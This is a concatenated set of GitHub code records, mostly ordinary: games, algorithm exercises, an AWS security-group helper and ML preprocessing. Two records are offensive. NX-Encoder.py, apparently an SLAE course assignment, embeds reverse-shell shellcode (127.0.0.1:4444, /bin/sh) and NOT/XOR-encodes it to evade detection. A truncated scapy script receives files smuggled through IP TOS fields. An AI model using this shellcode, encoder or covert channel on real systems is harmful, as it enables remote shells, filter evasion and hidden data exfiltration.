print(quick_sort(arr3)) # Should print [1, 2, 3, 4, 5]\n","repo_name":"pgioun/algorithms","sub_path":"quick_sort/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"32653321589","text":"# Anton Dimitrov\n# CS 152 Project 11\n# Fall 2019\n#\n# Template by Bruce A Maxwell\n# Fall 2018\n# CS 152 Project 11\n#\n# Make an Asteroids-like ship move around\n#\n# slightly modified by Eric Aaron, Fall 2018, Spring 2019\nimport math\nimport random\nimport time\nimport graphicsPlus as gr\nimport physics_objects as pho\nimport collision as coll\n\ndef buildObstacles(win):\n\t'''Create all of the obstacles in the scene and put them in a list;\n\teach obstacle is a Thing-inheriting object (Block, Hexagon, Rotating Block, Eye)\n different obstacles have different elasticities for exciting yet balanced bounciness!'''\n\thexagon = pho.Hexagon(win)\n\thexagon.setPosition(25, 25)\n\thexagon.elasticity = 0.5\n\t# rotating block\n\trblock1 = pho.RotatingBlock(win, 25, 5)\n\trblock1.setRotVelocity(10)\n\trblock1.setAngle(20)\n\trblock1.elasticity = 1.2\n\t# regular blocks\n\tblock2 = pho.Block(win)\n\tblock2.setPosition(40, 10)\n\tblock3 = pho.Block(win)\n\tblock3.setPosition(25, 40)\n\tblock4 = pho.Block(win)\n\tblock4.setPosition(10, 10)\n\t# eyes \n\teye1 = pho.Eye(win)\n\teye1.setPosition(10, 35)\n\teye1.elasticity = 0.8\n\teye2 = pho.Eye(win)\n\teye2.setPosition(40, 35)\n\teye2.elasticity = 0.8\n\t\n\tobstacles = [hexagon, rblock1, block2, block3, block4, eye1, eye2]\n\n # Return the list of Things\n\treturn obstacles\n\t\ndef StartScreen(win):\n\t'''Creates the initial stage that gives the players basic instructions'''\n\tblock = pho.Block(win, 25, 25, 50, 50)\n\tblock.setColor((255,20,147))\n\t# welcome message\n\twelcoming = gr.Text(gr.Point(250,150), \"Welcome to SpaceStar Catcher\")\n\twelcoming.setStyle('bold italic')\n\twelcoming.setSize(10)\n\t# instructions to procede \n\texitInstruct = gr.Text(gr.Point(250,220), \"You may press the Q key to quit at anytime\")\n\tcontinueInstruct = gr.Text(gr.Point(250,300), \"Press on the screen to create a ball and then score 10 hits\")\n\tcontinueInstruct.setSize(10)\n\tkeyUse = gr.Text(gr.Point(250,400), \"Player 1: Use the W, E, and S keys\tPlayer 2 : Use the Left, Right, and Space keys\")\n\tkeyUse.setSize(10)\n\t# draw start screen items \n\tblock.draw()\n\ttext = [welcoming, exitInstruct, continueInstruct, keyUse]\n\tfor item in text:\n\t\titem.draw(win)\n\twin.update()\n\treturn [block, welcoming, exitInstruct, continueInstruct, keyUse]\ndef undrawStartScreen(win, items):\n\t'''Removes the start screen from the window'''\n\tfor item in items:\n\t\titem.undraw()\ndef Gameplay(win):\n\t'''draws the Start Screen and undraws it when the user clicks inside the window;\n\ton the spot clicked, a ball is created and the game begins with the while loop;\n\twhen a player reaches 10 points, the loop/game ends;\n\tthe string with the winning player is returned'''\n\t# score points \n\tscore_p1 = 0\n\tscore_p2 = 0\n\t# variable used in rotation\n\tgamma = 10\n\t# variable used in acceleration\n\tdelta = 1\n\t# world wrap variables \n\twinWidth = 50\n\twinHeight = 50\n\t# framing\n\tdt = 0.01\n\tframe = 0\n\t# draw the obstacles defined in buildObstacles()\n\tobstacles = buildObstacles(win)\n\tfor item in obstacles:\n\t\titem.draw()\n\t# make one ship for each player, draw it (2-player game extension #1)\n\tship1 = pho.Ship(win, 20, 25)\n\tship1.draw()\n\tship1.setRotVelocity(20)\n\tship2 = pho.Ship(win, 30, 25)\n\tship2.draw()\n\tship2.setRotVelocity(20)\n\t# display the start screen with instructions\n\tstartItems = StartScreen(win)\n\t# make a ball \t\n\tclick = win.getMouse()\n\tball = pho.Ball(win)\n\tball.setPosition(click.getX()/ball.scale, (win.getHeight() - click.getY())/ball.scale)\n\tball.setVelocity(random.random()*10, random.random()*10)\n\tball.setAcceleration(0, -10)\n\tball.draw()\t\n\twhile True:\n\t\t# exit start screen upon clicking the mouse\n\t\tif click:\n\t\t\tundrawStartScreen(win, startItems)\n\t\tkey = win.checkKey()\n\t\t# exit game upon pressing 'q'\n\t\tif key == 'q':\n\t\t\tbreak\n\t\t#_____________________________________________________________________________PLAYER 1 SHIP MOVEMENT \n\t\t# if the user hits the 'a' key (spin left)\n\t\tif key == 'a':\n \t# set the rotational velocity to the old rotational velocity plus gamma\n\t\t\tship1.setRotVelocity(ship1.getRotVelocity() + gamma)\n \t# call the ship's setFlickerOn method with no arguments\n\t\t\tship1.setFlickerOn()\n \t# elif the user hits the 'd' key (spin right )\n\t\telif key == 'd':\n \t# set the rotational velocity to the old rotational veloity minus gamma\n\t\t\tship1.setRotVelocity(ship1.getRotVelocity() - gamma)\n \t# call the ship's setFlickerOn method with no arguments\n\t\t\tship1.setFlickerOn()\n\t\t# elif the user types 'w' (acceleration)\n\t\telif key == 'w': \n \t# assign to a the ship's current angle (getAngle)\n\t\t\ta1 = ship1.getAngle()\n \t# assign to theta the result of multiplying a by math.pi and dividing by 180\n\t\t\ttheta = a1*math.pi/100\n \t# assign to v the ship's current velocity (getVelocity)\n\t\t\tv1 = ship1.getVelocity()\n \t# set the ship's velocity to it's new values\n \t# The new X velocity is v_new_x = v_old_x + cos(theta) * delta\n\t\t\tv1_new_x = v1[0] + math.cos(theta)*delta\n \t# The new Y velocity is v_new_y = v_old_y + sin(theta) * delta\n\t\t\tv1_new_y = v1[1] + math.sin(theta)*delta\n\t\t\tship1.setVelocity(v1_new_x, v1_new_y)\n \t# call the ship's setFlickerOn method with no arguments\n\t\t\tship1.setFlickerOn()\n\t\t# assign to moveit the value False\n\t\tmoveit1 = False\n \t# assign to p the ship's current position. You might want to cast it to a list.\n\t\tp1 = list(ship1.getPosition())\n \t# if the x coordinate is less than 0\n\t\tif p1[0] < 0:\n \t# add winWidth to the x coordinate\n\t\t\tp1[0] = p1[0] + winWidth\n \t# assign to moveit the value True\n\t\t\tmoveit1 = True\n \t# elif the x coordinate is greater than winWidth\n\t\telif p1[0] > winWidth:\n \t# subtract winWidth from the x coordinate\n\t\t\tp1[0] = p1[0] - winWidth \n \t# assign to moveit the value True\n\t\t\tmoveit1 = True\n \t# if the y coordinate is less than 0\n\t\tif p1[1] < 0:\n \t# add winHeight to the y coordinate\n\t\t\tp1[1] = p1[1] + winHeight\n \t# assign to moveit the value True\n\t\t\tmoveit1 = True\n \t# elif the y coordinate is greater than winHeight\n\t\telif p1[1] > winHeight:\n \t# subtract winHeight from the y coordinate\n\t\t\tp1[1] = p1[1] - winHeight\n \t# assign to moveit the value True\n\t\t\tmoveit1 = True\n \t# if moveit:\n\t\tif moveit1:\n \t# set the ship's position to p\n\t\t\tship1.setPosition(p1[0], p1[1])\t\t\t\t\t\t\t\n\t\t#__________________________________________________________________________PLAYER 2 SHIP MOVEMENT\n\t\t# if the user hits the 'Left' key\n\t\tif key == 'Left':\n \t# set the rotational velocity to the old rotational velocity plus gamma\n\t\t\tship2.setRotVelocity(ship2.getRotVelocity() + gamma)\n \t# call the ship's setFlickerOn method with no arguments\n\t\t\tship2.setFlickerOn()\n \t# elif the user hits the 'Right' key\n\t\telif key == 'Right':\n \t# set the rotational velocity to the old rotational veloity minus gamma\n\t\t\tship2.setRotVelocity(ship2.getRotVelocity() - gamma)\n \t# call the ship's setFlickerOn method with no arguments\n\t\t\tship2.setFlickerOn()\n\t\t# elif the user hits 'Up' (acceleration)\n\t\telif key == 'Up': \n \t# assign to a the ship's current angle (getAngle)\n\t\t\ta2 = ship2.getAngle()\n \t# assign to theta the result of multiplying a by math.pi and dividing by 180\n\t\t\ttheta = a2*math.pi/100\n \t# assign to v the ship's current velocity (getVelocity)\n\t\t\tv2 = ship2.getVelocity()\n \t# set the ship's velocity to it's new values\n \t# The new X velocity is v_new_x = v_old_x + cos(theta) * delta\n\t\t\tv2_new_x = v2[0] + math.cos(theta)*delta\n \t# The new Y velocity is v_new_y = v_old_y + sin(theta) * delta\n\t\t\tv2_new_y = v2[1] + math.sin(theta)*delta\n\t\t\tship2.setVelocity(v2_new_x, v2_new_y)\n \t# call the ship's setFlickerOn method with no arguments\n\t\t\tship2.setFlickerOn()\n\t\t# assign to moveit the value False\n\t\tmoveit2 = False\n \t# assign to p the ship's current position. You might want to cast it to a list.\n\t\tp2 = list(ship2.getPosition())\n \t# if the x coordinate is less than 0\n\t\tif p2[0] < 0:\n \t# add winWidth to the x coordinate\n\t\t\tp2[0] = p2[0] + winWidth\n \t# assign to moveit the value True\n\t\t\tmoveit2 = True\n \t# elif the x coordinate is greater than winWidth\n\t\telif p2[0] > winWidth:\n \t# subtract winWidth from the x coordinate\n\t\t\tp2[0] = p2[0] - winWidth\n \t# assign to moveit the value True\n\t\t\tmoveit2 = True\n \t# if the y coordinate is less than 0\n\t\tif p2[1] < 0:\n \t# add winHeight to the y coordinate\n\t\t\tp2[1] = p2[1] + winHeight\n \t# assign to moveit the value True\n\t\t\tmoveit2 = True\n \t# elif the y coordinate is greater than winHeight\n\t\telif p2[1] > winHeight:\n \t# subtract winHeight from the y coordinate\n\t\t\tp2[1] = p2[1] - winHeight\n \t# assign to moveit the value True\n\t\t\tmoveit2 = True\n \t# if moveit:\n\t\tif moveit2:\n \t# set the ship's position to p\n\t\t\tship2.setPosition(p2[0], p2[1])\n\t\t# address collision between ships\n\t\tcoll.collision(ship1, ship2, dt)\n\t\t# move ships + rotating block\n\t\tship1.update(dt)\n\t\tship2.update(dt)\n\t\tobstacles[1].rotate(4)\n\t\t#____________________________________________________________BALL INTERACTION WITH OBSTACLES AND SHIPS\n\t\t# if the ball is out of bounds, re-launch it randomly \n\t\t(ball_px, ball_py) = ball.getPosition()\n\t\tif ball_px*ball.scale < ball.radius*ball.scale or ball_px*ball.scale > win.getWidth() - ball.radius*ball.scale or ball_py*ball.scale < ball.radius*ball.scale or ball_py*ball.scale > win.getHeight() - ball.radius*ball.scale:\n\t\t\t# reposition the ball \n\t\t\tball.setPosition(random.randint(5, 45), random.randint(15,45))\n\t\t# collisions\n\t\t# if the player 1 collides with the ball\n\t\tif coll.collision(ball, ship1, dt):\n\t\t\t# add one point to player 1's score\n\t\t\tscore_p1 += 1\n\t\t\tball.setColor((255, 0, 0))\n\t\t# if the player 2 collides with the ball\n\t\telif coll.collision(ball, ship2, dt):\n\t\t\t# add one point to player 2's score\n\t\t\tscore_p2 += 1\n\t\t\tball.setColor((0, 0, 255))\n\t\t# assign to collided (with obstacles) the value False\n\t\tcollided = False\n # for each item in the shapes list\n\t\tfor item in obstacles:\n # if the result of calling the collision function with the ball and the obstacle item is True\n\t\t\tif coll.collision(ball, item, dt):\n\t\t\t\tcollided = True\t\n # if collided is equal to False\n\t\tif collided == False:\n # call the update method of the ball with dt as the time step\n\t\t\tball.update(dt)\n\t\t\t\n\t\t# update window\n\t\tframe += 1\n\t\tif frame % 10 == 0:\n\t\t\twin.update()\n\t\t\ttime.sleep(0.5*dt)\n\t\t\t\n\t\t# if either player scores 10, game is finished \n\t\tif score_p1 == 10:\n\t\t\twinner = \"Player 1\"\n\t\t\tbreak\n\t\telif score_p2 == 10:\n\t\t\twinner = \"Player 2\"\n\t\t\tbreak\n\t# undraw everything after game ends \n\tship1.undraw()\n\tship2.undraw()\n\tball.undraw()\n\tfor item in obstacles:\n\t\titem.undraw()\n\t# return the winning player \n\treturn winner\n\t\t\ndef EndScreen(win, winner):\n\t'''Creates the final stage that shows the winner;\n\tbased on the button pressed, the player:\n\tQ - playAgain = False\n\tR - playsAgain = True\n\tthe results (playAgain) is returned'''\n\tblock = pho.Block(win, 25, 25, 50, 50)\t\n\tblock.setColor((0,255,0))\n\t# winner announced \n\twinnerString = \"Winner is {}!\".format(winner)\n\twinnerText = gr.Text(gr.Point(250,150), winnerString)\n\twinnerText.setStyle('bold italic')\n\twinnerText.setSize(15)\n\t# instructions \n\tagainInstruct = gr.Text(gr.Point(250,300), \"Press R to play again\") # play again extension #2\n\tagainInstruct.setSize(10)\n\tquitGame = gr.Text(gr.Point(250,400), \"Press Q to quit\")\n\tquitGame.setSize(10)\n\t# draw start screen items \n\tblock.draw()\n\ttext = [winnerText, againInstruct, quitGame]\n\tfor item in text:\n\t\titem.draw(win)\n\t\t\n\t# update window with the end screen announcement + instructions\n\twin.update()\n\t\n\t# Press Q to exit or Press R to play again (extension #2)\n\twhile True:\n\t\tkey = win.checkKey()\n\t\t# if Q, does not play again / playAgain = False\n\t\tif key == 'q':\n\t\t\tplayAgain = False\n\t\t\tbreak\n\t\t# if R, plays again / playAgain = True \n\t\telif key == 'r':\n\t\t\tplayAgain = True\n\t\t\tbreak\n\t\ttime.sleep(0.05)\n\t# at the end, undraw the visuals in this screen \n\tfor item in text:\n\t\titem.undraw()\n\tblock.undraw()\n\treturn playAgain\n\ndef main():\n\t'''creates the window for the simulation'''\n\t# make a window\n\twin = gr.GraphWin('SpaceStar Catcher', 500, 500, False)\n\t# always play the first game \n\tplayAgain = True\n\twhile playAgain:\n\t\t# winner variable holds the string with the winning player\n\t\twinner = Gameplay(win) \n\t\t# playing again depends on the button pressed by the player (Q to exit, R to play again)\n\t\tplayAgain = EndScreen(win, winner)\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"atmosse/starships","sub_path":"ship-simple.py","file_name":"ship-simple.py","file_ext":"py","file_size_in_byte":12506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"15962108314","text":"from datetime import datetime\n\nimport github3.session\nfrom github3 import GitHub\n\nfrom .config import CONFIG\n\n\nGITHUB_SESSION = None\n\n\ndef get_session() -> GitHub:\n global GITHUB_SESSION\n\n if GITHUB_SESSION is not None:\n return GITHUB_SESSION\n\n token = CONFIG[\"github_token\"]\n\n # Increase read timeout for creating PRs with long bodies.\n sess = github3.session.GitHubSession(default_read_timeout=30)\n gh = GitHub(token=token, session=sess)\n rate_limit = gh.rate_limit()[\"rate\"]\n limit = rate_limit[\"limit\"]\n remaining = rate_limit[\"remaining\"]\n reset = datetime.utcfromtimestamp(rate_limit[\"reset\"])\n print(f\"{remaining}/{limit} rate limit remaining\")\n print(f\"Reset at {reset} UTC (in {reset - datetime.utcnow()})\")\n GITHUB_SESSION = gh\n return GITHUB_SESSION\n","repo_name":"esphome/esphome-release","sub_path":"esphomerelease/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"33"} +{"seq_id":"39008702042","text":"total = 0\r\n\r\nwith open('basic_math_more.txt', 'r') as inp, open('flag.txt', 'w') as outp:\r\n for line in inp:\r\n try:\r\n num = long(line)\r\n total += num\r\n outp.write(line)\r\n except ValueError:\r\n print('{} is not a number!'.format(line))\r\n\r\nprint('Total of all numbers: {}'.format(total))","repo_name":"zard777/CTF_vault","sub_path":"NeverLAN2018/Scripting/SUM_basic_math_more.py","file_name":"SUM_basic_math_more.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"73287195294","text":"from sys import stdin\r\ndef chkSum(idx):\r\n res = 0\r\n if idx < 100:\r\n return idx\r\n res = 99\r\n for i in range (100, idx+1):\r\n if((int(str(i)[2]) - int(str(i)[1])) == (int(str(i)[1]) - int(str(i)[0]))):\r\n res = res + 1\r\n return res\r\nidx = int(stdin.readline())\r\nprint(chkSum(idx))","repo_name":"didue/algorithm-study","sub_path":"jeonghun/함수/1065.py","file_name":"1065.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"4385074695","text":"def print_iterator(it):\n for x in it:\n print(x, end=' ')\n print('\\n')\n\n\n# reversed string\nr = reversed('abc')\nprint(type(r))\nprint(r)\nprint_iterator(r)\n\n# reversed list\nr = reversed([1, 2, 3])\nprint_iterator(r)\n\n# reversed tuple\nr = reversed((1, 2, 3))\nprint_iterator(r)\n\n# reversed bytes\nr = reversed(bytes('abc', 'utf-8'))\nprint_iterator(r)\n\n# reversed bytearray\nr = reversed(bytearray('abc', 'utf-8'))\nprint_iterator(r)\n\n\n# object with __reversed__ method\nclass Data:\n name = ''\n\n def __init__(self, n):\n self.name = n\n\n def __reversed__(self):\n return reversed(self.name)\n\n\nd = Data('ABC')\n\nr = reversed(d)\n\nprint_iterator(r)\n\n\n# object supporting sequence protocol i.e.\n# implementing __len__() and __getitem__ method\nclass MyTupleWrapper:\n t = ()\n\n def __init__(self, tu):\n if not isinstance(tu, tuple):\n return ValueError('Only accepts tuple')\n self.t = tu\n\n def __len__(self):\n return len(self.t)\n\n def __getitem__(self, index):\n return self.t[index]\n\n\nmt = MyTupleWrapper((1, 2, 3, 4))\nr = reversed(mt)\nprint_iterator(r)\n","repo_name":"WebJournal/journaldev","sub_path":"Python-3/basic_examples/python_reversed_examples.py","file_name":"python_reversed_examples.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":1282,"dataset":"github-code","pt":"33"} +{"seq_id":"1546137382","text":"\"\"\"\n最佳买卖股票时机含冻结期\n\n链接:https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-with-cooldown\n\n给定一个整数数组,其中第 i 个元素代表了第 i 天的股票价格 。\n\n设计一个算法计算出最大利润。在满足以下约束条件下,你可以尽可能地完成更多的交易(多次买卖一支股票):\n\n你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。\n\n卖出股票后,你无法在第二天买入股票 (即冷冻期为 1 天)。\n\n示例:\n输入: [1,2,3,0,2]\n输出: 3\n解释: 对应的交易状态为: [买入, 卖出, 冷冻期, 买入, 卖出]\n\n解法:\n1. 动态规划(状态机)\n\n\"\"\"\nimport unittest\nfrom typing import List\n\n\nclass Solution:\n def max_profit(self, prices: List[int]) -> int:\n n = len(prices)\n dp_i_0, dp_i_1 = 0, float(\"-inf\")\n dp_pre_0 = 0 # 表示 dp[i-2][0]\n for i in range(n):\n tmp = dp_i_0\n dp_i_0 = max(dp_i_0, dp_i_1 + prices[i])\n dp_i_1 = max(dp_i_1, dp_pre_0 - prices[i])\n dp_pre_0 = tmp\n return dp_i_0\n\n\nclass Cases:\n def __init__(self, prices: List[int], want: int):\n self.prices: List[int] = prices\n self.want: int = want\n\n\nclass TestSolution(unittest.TestCase):\n def setUp(self) -> None:\n self.s = Solution()\n\n def test_max_profit(self):\n test_cases = (Cases([1, 2, 3, 0, 2], 3),)\n\n for tc in test_cases:\n output = self.s.max_profit(tc.prices)\n self.assertEqual(tc.want, output)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Nigirimeshi/leetcode","sub_path":"0309_best-time-buy-and-sell-stock-with-cooldown.py","file_name":"0309_best-time-buy-and-sell-stock-with-cooldown.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"16077536115","text":"#!/Users/bogdan/.virtualenvs/lb/bin/python\nimport boto3\nimport requests\nimport argparse\nimport sys\nfrom botocore.exceptions import ClientError\n\n\ndef authorize():\n security_group.authorize_ingress(IpPermissions=[\n {\n 'FromPort': -1,\n 'ToPort': -1,\n 'IpProtocol': '-1',\n 'IpRanges': [\n {\n 'CidrIp': f'{current_ip}/{cidr_size}',\n 'Description': rule_desc\n },\n ],\n }\n ])\n\n\ndef revoke(ip):\n security_group.revoke_ingress(CidrIp=ip, IpProtocol='-1')\n\n\ndef get_current_ip():\n r = requests.get('http://ipv4.wtfismyip.com/json')\n if not r:\n print('Error: Cannot get current IP address.')\n sys.exit(1)\n\n response = r.json()\n current_ip = response['YourFuckingIPAddress']\n print(f'Current IP address: {current_ip}')\n\n return current_ip\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Authorize IP in AWS group')\n parser.add_argument('--clear-ip', action='store_true', help='Remove current/given IP from the security group')\n parser.add_argument('--ip', type=str, help='IP to whitelist')\n parser.add_argument('--group-id', default='sg-c9a04cb0', type=str, help='AWS group ID')\n parser.add_argument('--cidr-size', default=32, type=int, help='CIDR block size (default 32)')\n parser.add_argument('--rule-desc', default='Bogdan', type=str, help='Rule description')\n\n args = parser.parse_args()\n group_id = args.group_id\n cidr_size = args.cidr_size\n rule_desc = args.rule_desc.lower()\n \n # init\n ec2 = boto3.resource('ec2')\n security_group = ec2.SecurityGroup(group_id)\n\n if args.ip:\n current_ip = args.ip\n else:\n current_ip = get_current_ip()\n \n # clear current ip, if wanted\n if args.clear_ip is True:\n revoke(f'{current_ip}/{cidr_size}')\n sys.exit(0)\n \n ips = list(filter(lambda x: 'Description' in x and x['Description'].lower().startswith(rule_desc), \n security_group.ip_permissions[0]['IpRanges']))\n ips = [x['CidrIp'] for x in ips]\n if not ips:\n print('No IPs found with that description')\n \n for ip in ips:\n revoke(ip)\n \n try:\n authorize()\n except ClientError as e:\n if 'InvalidPermission.Duplicate' not in str(e):\n raise e\n if not ips: # fix\n revoke(f'{current_ip}/{cidr_size}')\n authorize()\n \n print(f'Successfully authorized IP: {current_ip}')\n","repo_name":"xbogdan/scripts","sub_path":"edit-access.py","file_name":"edit-access.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"15155455226","text":"from shapeae import settings\nimport pytest\nimport json\nfrom pathlib import Path\n\ndef test_settings_default_values():\n with open(Path(__file__).parents[2].joinpath(\"default_params.json\"), 'r') as f:\n default_params = json.load(f)\n \n for (_k, _v) in default_params.items():\n assert getattr(settings, _k) == _v\n\ndef test_setting_values_with_object_attributes():\n _params = dict(\n path= \"path1\",\n result_path = \"path2\",\n pretrained_weights_path = \"path3\",\n random_seed = 42,\n batch_size = 10,\n epochs_ShapeAE = 100,\n epochs_cShapeAE = 1000,\n )\n settings.path = _params['path']\n settings.result_path = _params['result_path']\n settings.pretrained_weights_path = _params['pretrained_weights_path']\n settings.random_seed = _params['random_seed']\n settings.batch_size = _params['batch_size']\n settings.epochs_ShapeAE = _params['epochs_SHAPR']\n settings.epochs_cShapeAE = _params['epochs_cSHAPR']\n\n assert settings.path == _params['path']\n assert settings.result_path == _params['result_path']\n assert settings.pretrained_weights_path == _params['pretrained_weights_path']\n assert settings.random_seed == _params['random_seed']\n assert settings.batch_size == _params['batch_size']\n assert settings.epochs_ShapeAE == _params['epochs_SHAPR']\n assert settings.epochs_cShapeAE == _params['epochs_cSHAPR']\n\ndef test_setting_read_json():\n settings.read_json(Path(__file__).parents[1].joinpath(\"test_data/json\", \"settings_testing_params.json\"))\n\n\n assert settings.path == \"path1_json\"\n assert settings.result_path == \"path2_json\"\n assert settings.pretrained_weights_path == \"path3_json\"\n assert settings.random_seed == 21\n assert settings.batch_size == 5\n assert settings.epochs_ShapeAE == 50\n assert settings.epochs_cShapeAE == 500\n\n\n","repo_name":"marrlab/SHAPR_torch","sub_path":"shapr/tests/unit_tests/test_settings.py","file_name":"test_settings.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"33"} +{"seq_id":"72939820255","text":"import pandas as pd\nimport numpy as np\n\ndef to_polar(start, end):\n x1, y1 = start[0], start[1]\n x2, y2 = end[0], end[1]\n\n vec = np.array([x2 - x1, y2 - y1])\n\n delta_r = np.sqrt(vec[0] ** 2 + vec[1] ** 2)\n delta_phi = np.arctan2(vec[1], vec[0])\n\n return np.array([delta_r, delta_phi])\n\n\ndef dest_from_polar(start, polar):\n x_s, y_s = start[:, 0], start[:, 1]\n r, theta = polar[:, 0], polar[:, 1]\n\n x = r * np.cos(theta)\n y = r * np.sin(theta)\n\n x = x + x_s\n y = y + y_s\n\n return np.transpose(np.array([x, y]))\n\n\ndef is_nan(y):\n s = y.sum()\n return np.isnan(s.sum())\n\n\ndef remove_nan_values(df):\n mask3 = ~df[\"polar\"].apply(lambda x: is_nan(x))\n df = df[mask3]\n return df\n\n\ndef stack_and_reshape(m1, m2, m3):\n all_measures = np.stack([m1, m2, m3], axis=1)\n all_measures = all_measures.reshape(-1, 9)\n return np.array(all_measures)\n\n\ndef get_short_sequences(df, min_len, max_len):\n df[\"len\"] = df[\"acce\"].apply(lambda x: len(x))\n df = df[(df[\"len\"] >= min_len) & (df[\"len\"] < max_len)]\n return df","repo_name":"amnayk/indoorlocation","sub_path":"src/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"16065132708","text":"#!/usr/bin/python3\n# NX-Encoder.py\n# Author: Michael Norris\n\nimport random\n\n\ndef n_encode(bytes_obj):\n return [(~byte & 0xff) for byte in bytes_obj]\n\n\ndef x_encode(bytes_obj):\n return [(byte ^ xor_byte) for byte in bytes_obj]\n\n\ndef find_unused_byte(bytes_obj):\n byte_range = [i for i in range(256)]\n xor_list = [byte for byte in byte_range if byte not in bytes_obj]\n return random.choice(xor_list)\n\n\ndef format_shellcode(bytes_obj, hex_format=True):\n encoded = ''\n if hex_format:\n for byte in bytes_obj:\n encoded += '0x'\n encoded += '%02x,' % byte\n encoded = encoded[:-1]\n else:\n for byte in bytes_obj:\n encoded += '\\\\x'\n encoded += '%02x' % byte\n return encoded\n\n\ndef decode_shellcode(bytes_obj):\n return n_encode(x_encode(bytes_obj))\n\n\nshellcode = bytearray(b'\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x93\\x59\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x68\\x7f\\x00\\x00\\x01\\x68\\x02\\x00\\x11\\x5c\\x89\\xe1\\xb0\\x66\\x50\\x51\\x53\\xb3\\x03\\x89\\xe1\\xcd\\x80\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80')\n\nn_encoded = n_encode(shellcode)\n\nxor_byte = find_unused_byte(n_encoded)\nnx_encoded = x_encode(n_encoded)\n\ndelimiter = find_unused_byte(nx_encoded)\nnx_encoded.append(delimiter)\n\nformatted_shellcode = format_shellcode(nx_encoded)\n\nprint('Length: %d' % len(nx_encoded))\nprint('XOR Delimiter: ' + hex(delimiter))\nprint('XOR Byte: ' + hex(xor_byte))\nprint(formatted_shellcode)\n","repo_name":"norrismw/SLAE","sub_path":"assignments/assignment-4/NX-Encoder.py","file_name":"NX-Encoder.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"9870129868","text":"from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n\n@app.route('/convert_time.py', methods=['POST'])\ndef convert_time():\n time = request.form['time']\n converted_time = convert_to_12_hour_format(time)\n return render_template('result.html', time=time, converted_time=converted_time)\n\n\ndef convert_to_12_hour_format(time):\n # Splitting the time into hours and minutes\n hours, minutes = time.split(':')\n\n # Converting hours to integer\n hours = int(hours)\n\n # Determining AM/PM\n if hours >= 12:\n period = 'PM'\n hours -= 12\n else:\n period = 'AM'\n\n # Handling special cases\n if hours == 0:\n hours = 12\n\n # Formatting the converted time\n converted_time = f'{hours}:{minutes} {period}'\n return converted_time\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"shreyasat27/python_2023","sub_path":"project 1 (clock_converter)/convert_time.py","file_name":"convert_time.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"40383324325","text":"import numpy as np\nimport pandas as pd\nfrom sklearn import svm\n\ndef get_best_acc(err):\n best = err.iloc[err[2].argmax()]\n return best[0], best[1]\n\ndef dataset3Params(X, y, Xval, yval):\n \"\"\"returns your choice of C and sigma. You should complete\n this function to return the optimal C and sigma based on a\n cross-validation set.\n \"\"\"\n\n# You need to return the following variables correctly.\n\n# ====================== YOUR CODE HERE ======================\n# Instructions: Fill in this function to return the optimal C and sigma\n# learning parameters found using the cross validation set.\n# You can use svmPredict to predict the labels on the cross\n# validation set. For example, \n# predictions = svmPredict(model, Xval)\n# will return the predictions on the cross validation set.\n#\n# Note: You can compute the prediction error using \n# mean(double(predictions ~= yval))\n#\n c_list = [0.01, 0.03, 0.1, 0.3, 1, 3, 10, 30]\n sig_list = c_list\n err = []\n for c_val in c_list:\n for sig_val in sig_list:\n gamma = 1.0 / (2.0 * sig_val ** 2)\n clf = svm.SVC(C=c_val, kernel='rbf', gamma=gamma, max_iter=200).fit(X, y)\n e = clf.score(Xval, yval)\n err.append([c_val, sig_val, e])\n return get_best_acc(pd.DataFrame(err))\n\n# =========================================================================\n","repo_name":"matkalinowski/ML-AndrewNg","sub_path":"ex6/grader/dataset3Params.py","file_name":"dataset3Params.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"30221074604","text":"\n#!/usr/bin/python\n\nfrom scapy.all import *\nimport sys\nimport os\n\n# tos = 1: filename ; tos = 0: payload ; tos = 2: EOF\nlast_tos = 0\n\nfilename = \"\"\npayload = b\"\"\n\ndef process_packet(packet):\n\tglobal last_tos\n\tglobal filename\n\tglobal payload\n\n\ttransfered_bytes = 0\n\tif type(filename) != str:\n\t\tfilename = filename.decode()\n\tprint(\"1: 